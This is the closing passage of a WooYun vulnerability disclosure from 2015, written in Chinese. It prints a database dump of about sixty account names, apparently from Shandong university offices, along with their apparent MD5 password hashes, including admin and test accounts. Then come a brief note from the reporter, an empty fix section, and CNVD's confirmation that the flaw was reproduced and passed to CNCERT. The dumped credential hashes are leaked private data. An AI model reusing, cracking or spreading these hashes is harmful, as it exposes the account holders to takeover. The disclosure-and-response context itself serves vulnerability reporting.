| 26 | JNYXY | 9971123D2465A45D99907A53D69225E4 |
| 27 | LCDX | B98B79A53B875B8CB044EB8F589AE6B5 |
| 28 | LCDXDCXY | B1B7F55BF7EBD3BC |
| 29 | LDDX | FDE64820C67454FE8857FF7DA044B946 |
| 30 | LYDX | 5C8E060CD9A88458A26031FDA75CA158 |
| 31 | QDDX | 54FE8CDBD8EE1C04EE2D826771813011 |
| 32 | QDKJDX | 0D523A4269EDAC440FAF6031C758AA4E |
| 33 | QDLGDX | C7ACFE4BE425E6935F58775750FC576D |
| 34 | QDLGDXQDXY | 54496614AEF3580C56CF57932DAB4B1A |
| 35 | QDNYDX | 7BA749B9A7FE7B8D01B2C907C0F612D0 |
| 36 | QDNYDXHDXY | C63F54378D3DE2A2 |
| 37 | QFSFDX | 3C7D115DEA001CAB |
| 38 | QLGYDX | EF8B966A0E43841C8DB4799BD3B18D14 |
| 39 | QLSFXY | 0FE99B2E0836285C |
| 40 | SDCJDX | 2FEAFA22E57480EC70DDA53B32381513 |
| 41 | SDCJDXDFXY | F8AA28067CBB284B24AC57A4B5455EAD |
| 42 | SDCJDXYSXY | 74FEEB14F83F5752DFF3034F20EC1528 |
| 43 | SDDX | 0E9D4036EF97E161 |
| 44 | SDGLXY | 5D13495C29754B30D9C483F7134C8CB4 |
| 45 | SDGSXY | D7A706A09AAAD06F62D4316315457003 |
| 46 | SDGYMSXY | 206F1F2214E63AEEB9B6BABA5BAED462 |
| 47 | SDJCXY | 49D276C888263B587475CF2547287BD8 |
| 48 | SDJTXY | 90A4BB83AC277CD8A658BA51BD280020 |
| 49 | SDJZDX | 82753D983F00FAC9 |
| 50 | SDKJDX | 91F1CF2F11E362ECC8E2A327E565ECD1 |
| 51 | SDKJDXTSKJXY | F661A4384C6B50EB |
| 52 | SDLGDX | C06EE17884D99FBF |
| 53 | SDNYDX | 03A60ACB4CBFD4A7 |
| 54 | SDNYGCXY | 244F65C6E6AABBCABDEC9335E7A6A290 |
| 55 | SDNZXY | 4485ACFAB22EFF25 |
| 56 | SDQNZZXY | 5BDF575A5F000BCF14182D135F666A3F |
| 57 | SDSFDX | AF2DD4900B1C05070CBB66DC84A082C1 |
| 58 | SDSFDXLSXY | 72E2F12271B09FA501E1F22100168E4F |
| 59 | SDTYXY | F527EB6A0E49F48153273F97C6C4C86B |
| 6 | gaojiaochu | 11BE2C16A0C5BF04172F0A1553A20279 |
| 60 | SDYSXY | 937723A3EF73A2FA205DC2DDD5FD7D8B |
| 61 | SDZFXY | 27AD6E1CB895B3C22C9D1896B0818B8E |
| 62 | SDZYYDX | EFF9248A018921341D0D2C5817B9935A |
| 63 | TSXY | D54C3E1ABCA3F5E4183D8BAFAB5E2DCF |
| 64 | TSYXY | 22DE622D62AECA32 |
| 65 | WFXY | 1B49C344183F8B05DD76F7EEE34C4E97 |
| 66 | WFYXY | 19602E5ECA6392AD045304CCD69FFC3D |
| 67 | YTDX | D0686BB7D2FA2C8E |
| 68 | YTDXWJXY | 2B5E4EF8AA8883446BA9A3C53B9BE74F |
| 69 | ZGHYDX | 6B80751B99DFB25FAD6277596400A13E |
| 7 | QDGXY | A70622D2CD0D9E306C4172054B880EE3 |
| 70 | ZGSYDX | 1DB57C22DA51B35C8DE3ACE7F6229CFB |
| 71 | ZGSYDXSLXY | E6FCF6D1D27B1E71 |
| 72 | ZZXY | 437069A44661ADC4C47E0696059A4108 |
| 73 | gjyjs | D128F72926E6A1CA |
| 74 | HEBGYDXWH | 163DC001E6FA3E486815DB83DFC538DC |
| 75 | SDWHFX | A243D2F47DAC004D |
| 76 | test | 6E8861AC7DD71853 |
| 77 | abc | 73A203B47727D149 |
| 79 | gaojiaochuadmin | CFF8B5829CCD080E |
| 8 | QDHHXY | 463EF25B8F6A095B20C73B6F6EEB46F8 |
| 81 | HJHKGCXY | D53B9C02536C6393E756F17FA916F39C |
| 82 | abcde | D858A3EF3DED2BB8 |
| 83 | shpg1 | 8EF348C7FA434C020EFBA482DE339504 |
| 9 | QDHXKJXY | D18B65E5377C27029D6AF558355CD17E |
+----+-----------------+----------------------------------+
存在存在漏洞 不深入 达到目标就OK。。。
修复方案:
你们更了解。。。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-12-01 17:08
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发山东分中心,由其后续协调网站管理单位处置。
最新状态:
暂无